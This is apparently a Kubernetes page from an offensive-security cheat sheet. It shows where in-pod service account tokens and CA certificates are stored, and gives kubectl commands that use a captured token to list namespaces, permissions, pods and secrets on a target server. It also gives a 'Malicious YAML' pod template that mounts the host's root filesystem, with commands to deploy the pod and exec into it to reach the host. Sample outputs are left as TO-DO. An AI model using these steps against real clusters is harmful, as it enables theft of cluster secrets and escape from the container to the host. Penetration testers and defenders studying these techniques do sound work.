TLDRBins TLDRBins / Kubernetes

Usage Tips:

  • Click on a keyword to enable inline editing.
  • Click inside a code block to copy (excludes comments).
  • Use the button to view examples.
  • Click outside to collapse all examples.

Token Location

/run/secrets/kubernetes.io/serviceaccount/token

Sample Output:
TO-DO

Certificate Location

/run/secrets/kubernetes.io/serviceaccount/ca.crt

Sample Output:
TO-DO

Basic Commands

# List all namespaces
kubectl --token <TOKEN> --certificate-authority ca.crt --server <TARGET> get namespaces

Sample Output:
TO-DO
# Get user permissions in current namespace
kubectl --token <TOKEN> --certificate-authority ca.crt --server <TARGET> auth can-i --list

Sample Output:
TO-DO
# Get user permissions in specific namespace
kubectl --token <TOKEN> --certificate-authority ca.crt --server <TARGET> auth can-i --list -n <NAMESPACE>

Sample Output:
TO-DO
# List all pods
kubectl --token <TOKEN> --certificate-authority ca.crt --server <TARGET> get pods --all-namespaces

Sample Output:
TO-DO
# List pods in specific namespace
kubectl --token <TOKEN> --certificate-authority ca.crt --server <TARGET> get pods -n <NAMESPACE>

Sample Output:
TO-DO
# Get YAML of a pod
kubectl --token <TOKEN> --certificate-authority ca.crt --server <TARGET> get pod <POD_NAME> -o yaml

Sample Output:
TO-DO
# Get info of a pod
kubectl --token <TOKEN> --certificate-authority ca.crt --server <TARGET> describe pod <POD_NAME> -n <NAMESPACE>

Sample Output:
TO-DO
# List secrets
kubectl --token <TOKEN> --certificate-authority ca.crt --server <TARGET> get secrets -n <NAMESPACE>

Sample Output:
TO-DO
# Get info of a secret
kubectl --token <TOKEN> --certificate-authority ca.crt --server <TARGET> describe secret <SECRET_NAME> -n <NAMESPACE>

Sample Output:
TO-DO

Ref: kubectl

Abuse #1: Mount host’s file system

1. Create a Malicious YAML (Template)

apiVersion: v1 
kind: Pod
metadata:
  name: alpine
  namespace: <NAMESPACE_NAME>
spec:
  containers:
  - name: test
    image: <IMAGE_NAME>
    command: ["/bin/sh"]
    args: ["-c", "sleep 300000"]
    volumeMounts: 
    - mountPath: /mnt
      name: hostfs
  volumes:
  - name: hostfs
    hostPath:  
      path: /
  automountServiceAccountToken: true
  hostNetwork: true

Sample Output:
TO-DO

2. Create a new pod

kubectl --token <TOKEN> --certificate-authority ca.crt --server <TARGET> apply -f test.yaml

Sample Output:
TO-DO

3. Execute

kubectl --token <TOKEN> --certificate-authority ca.crt --server <TARGET> exec test --stdin --tty -n <NAMESPACE>

Sample Output:
TO-DO
# Check host filesystem
cd /mnt/root/

Sample Output:
TO-DO